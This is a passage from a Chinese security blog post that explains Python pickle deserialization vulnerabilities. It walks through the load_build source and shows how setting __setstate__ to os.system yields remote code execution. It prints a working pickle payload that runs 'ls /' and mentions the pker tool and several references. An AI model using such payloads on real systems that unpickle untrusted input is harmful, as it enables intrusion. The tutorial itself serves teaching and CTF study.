        inst <span class="token operator">=</span> stack<span class="token punctuation">[</span><span class="token operator">-</span><span class="token number">1</span><span class="token punctuation">]</span>
        setstate <span class="token operator">=</span> getattr<span class="token punctuation">(</span>inst<span class="token punctuation">,</span> <span class="token string">"__setstate__"</span><span class="token punctuation">,</span> None<span class="token punctuation">)</span>
        <span class="token keyword">if</span> setstate<span class="token punctuation">:</span> <span class="token comment" spellcheck="true">#如果__setstate__存在，state就由它来处理</span>
            setstate<span class="token punctuation">(</span>state<span class="token punctuation">)</span>
            <span class="token keyword">return</span>
        slotstate <span class="token operator">=</span> None
        <span class="token keyword">if</span> isinstance<span class="token punctuation">(</span>state<span class="token punctuation">,</span> tuple<span class="token punctuation">)</span> <span class="token operator">and</span> len<span class="token punctuation">(</span>state<span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">2</span><span class="token punctuation">:</span>
            state<span class="token punctuation">,</span> slotstate <span class="token operator">=</span> state
        <span class="token keyword">if</span> state<span class="token punctuation">:</span> <span class="token comment" spellcheck="true">#不存在就将state这个dict放入inst.__dict中</span>
            <span class="token keyword">try</span><span class="token punctuation">:</span>
                d <span class="token operator">=</span> inst<span class="token punctuation">.</span>__dict__
                <span class="token keyword">try</span><span class="token punctuation">:</span>
                    <span class="token keyword">for</span> k<span class="token punctuation">,</span> v <span class="token keyword">in</span> state<span class="token punctuation">.</span>iteritems<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
                        d<span class="token punctuation">[</span>intern<span class="token punctuation">(</span>k<span class="token punctuation">)</span><span class="token punctuation">]</span> <span class="token operator">=</span> v
                <span class="token keyword">except</span> TypeError<span class="token punctuation">:</span>
                    d<span class="token punctuation">.</span>update<span class="token punctuation">(</span>state<span class="token punctuation">)</span>
            <span class="token keyword">except</span> RuntimeError<span class="token punctuation">:</span>
                <span class="token keyword">for</span> k<span class="token punctuation">,</span> v <span class="token keyword">in</span> state<span class="token punctuation">.</span>items<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
                    setattr<span class="token punctuation">(</span>inst<span class="token punctuation">,</span> k<span class="token punctuation">,</span> v<span class="token punctuation">)</span>
        <span class="token keyword">if</span> slotstate<span class="token punctuation">:</span>
            <span class="token keyword">for</span> k<span class="token punctuation">,</span> v <span class="token keyword">in</span> slotstate<span class="token punctuation">.</span>items<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
                setattr<span class="token punctuation">(</span>inst<span class="token punctuation">,</span> k<span class="token punctuation">,</span> v<span class="token punctuation">)</span>
    dispatch<span class="token punctuation">[</span>BUILD<span class="token punctuation">]</span> <span class="token operator">=</span> load_build</code></pre>
<p>还是接上面的题目。如果在Stu中利用{‘__ setstate __ ‘: os.system}build一个对象，那么这个对象的__ setstate __ 现在就是os.system了。之后以’ls /‘再次build一个对象，这个对象的__ setstate __已经是os.system，也就成功RCE了。</p>
<p>payload</p>
<pre class=" language-python"><code class="language-python">b<span class="token string">'\x80\x03c__main__\nStu\n)\x81}(V__setstate__\ncos\nsystem\nubVls /\nb.'</span></code></pre>
<p>命令执行成功。</p>
<p><img src="//dddwmr.github.io/2020/12/31/Python反序列化/image-20210105171408311.png" srcset="/img/loading.gif" alt="image-20210105171408311"></p>
<h2 id="工具"><a href="#工具" class="headerlink" title="工具"></a>工具</h2><p>pker</p>
<p><a href="https://github.com/eddieivan01/pker" target="_blank" rel="noopener">https://github.com/eddieivan01/pker</a></p>
<p>参考：<a href="http://www.bendawang.site/2018/04/18/Python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E8%8A%B1%E5%BC%8F%E5%88%A9%E7%94%A8/" target="_blank" rel="noopener">http://www.bendawang.site/2018/04/18/Python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%9A%84%E8%8A%B1%E5%BC%8F%E5%88%A9%E7%94%A8/</a></p>
<p><a href="https://zhuanlan.zhihu.com/p/89132768" target="_blank" rel="noopener">https://zhuanlan.zhihu.com/p/89132768</a></p>
<p><a href="https://www.v0n.top/2020/03/29/Python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/" target="_blank" rel="noopener">https://www.v0n.top/2020/03/29/Python%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/</a></p>

            <hr>
          </div>
          <br>
          <div>
            <p>
            
              <span>
                <i class="iconfont icon-inbox"></i>
                
                  <a class="hover-with-bg" href="/categories/%E5%B8%B8%E8%A7%81%E6%BC%8F%E6%B4%9E">常见漏洞</a>
                  &nbsp;
                
              </span>&nbsp;&nbsp;
            
            
              <span>
                <i class="iconfont icon-tag"></i>
                
                  <a class="hover-with-bg" href="/tags/Python%E5%8F%8D%E5%BA%8F%E5%88%97">Python反序列</a>
                
              </span>
            
            </p>
            
              <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" rel="nofollow noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
            
          </div>
        </div>
      </div>
    </div>
    <div class="d-none d-lg-block col-lg-2 toc-container">
      
  <div id="toc">
    <p class="h4"><i class="far fa-list-alt"></i>&nbsp;ディレクトリ</p>
    <div id="tocbot"></div>
  </div>

    </div>
  </div>
</div>

<!-- custom -->


<!-- Comments -->
<div class="col-lg-7 mx-auto nopadding-md">
  <div class="container comments mx-auto" id="comments">
    
  </div>
</div>

    
  </main>

  
    <a class="z-depth-1" id="scroll-top-button" href="#" role="button">
      <i class="fa fa-chevron-up scroll-top-arrow" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">検索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">キーワード</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  <footer class="mt-5">
  <div class="text-center py-3">
    <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><b>Hexo</b></a>
    <i class="iconfont icon-love"></i>
    <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"> <b>Fluid</b></a>
    <br>

    
  
    <!-- 不蒜子统计PV -->
    
    &nbsp;<span id="busuanzi_container_site_pv"></span>总访问量 
          <span id="busuanzi_value_site_pv"></span> 次&nbsp;
  
  
    <!-- 不蒜子统计UV -->
    
    &nbsp;<span id="busuanzi_container_site_uv"></span>总访客数 
            <span id="busuanzi_value_site_uv"></span> 人&nbsp;
  
  <br>



    


    <!-- cnzz Analytics icon -->
    

  </div>
</footer>

<!-- SCRIPTS -->
<script src="/lib/jquery/jquery.min.js" ></script>
<script src="/lib/popper/popper.min.js" ></script>
<script src="/lib/bootstrap/js/bootstrap.min.js" ></script>
<script src="/lib/mdbootstrap/js/mdb.min.js" ></script>
<script src="/js/main.js" ></script>


  <script src="/js/lazyload.js" ></script>



  
    <script src="/lib/tocbot/tocbot.min.js" ></script>
  
  <script src="/js/post.js" ></script>



  <script src="/lib/smoothscroll/SmoothScroll.min.js" ></script>



  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>


<!-- Plugins -->


  

  

  

  

  <!-- cnzz Analytics -->
  





  <script src="/lib/typed/typed.min.js" ></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "Python反序列化&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script src="/lib/anchor/anchor.min.js" ></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "false",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script src="/js/local-search.js" ></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      getSearchFile(path);
      this.onclick = null
    }
  </script>



  <script src="/lib/fancybox/jquery.fancybox.min.js" ></script>
  <script>
    $("#post img:not(.no-zoom img, img[no-zoom])").each(
      function () {
        var element = document.createElement("a");
        $(element).attr("data-fancybox", "images");
        $(element).attr("href", $(this).attr("src"));
        $(this).wrap(element);
      }
    );
  </script>












</body>
</html>
